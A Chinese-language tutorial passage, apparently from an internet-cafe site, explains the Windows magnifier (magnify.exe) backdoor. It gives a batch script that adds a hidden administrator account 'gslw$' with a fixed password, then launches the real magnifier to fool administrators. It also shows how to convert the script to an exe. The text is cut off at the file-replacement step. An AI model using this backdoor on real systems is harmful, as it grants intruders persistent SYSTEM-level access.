4、放大镜程序，最狡猾的后门 采本站者，必打击者

　　放大镜(magnify.exe)是Windows 2000/XP/2003系统集成的一个小工具，它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具，因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序，从而达到控制服务器的目的。 采本站，必打击者

　　通常情况下，攻击者通过构造的magnify.exe程序创建一个管理员用户，然后登录系统。当然有的时候他们也会通过其直接调用命令提示符(cmd.exe)或者系统shell(explorer.exe)。需要说明的是，这样调用的程序都是system权限，即系统最高权限。不过，以防万一当管理员在运行放大镜程序时发现破绽，攻击者一般通过该构造程序完成所需的操作后，最后会运行真正的放大镜程序，以蒙骗管理员。其利用的方法是： 网吧58UN

　　(1).构造批处理脚本

　　@echo off 永叔的站你也敢采，

　　net user gslw$ test168 /add

　　net localgroup administrators gslw$ /add

　　%Windir%\system32\nagnify.exe

　　exit 采本站者，必打击者

　　将上面的脚本保存为magnify.bat，其作用是创建一个密码为test168的管理员用户gslw$，最后运行改名后的放大镜程序nagnify.exe。(图2)

网吧58UN

    网吧联盟 www.58un.com.cn

    
    (2).文件格式转换 采本站，必打击者

　　因为批处理文件magnify.bat的后缀是bat，必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件，当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。 支持58UN，支持中国网吧

　　打开命令行，进入bat2com、com2exe工具所在的目录，然后运行命令“bat2com magnify.bat”将magnify.bat转换成magnify.com，继续运行命令“com2exe magnify.com”将magnify.com转换成magnify.exe，这样就把批处理文件转换成和放大镜程序同名的程序文件。(图3) 后果很严重

支持58UN，支持中国网吧

3).放大镜文件替换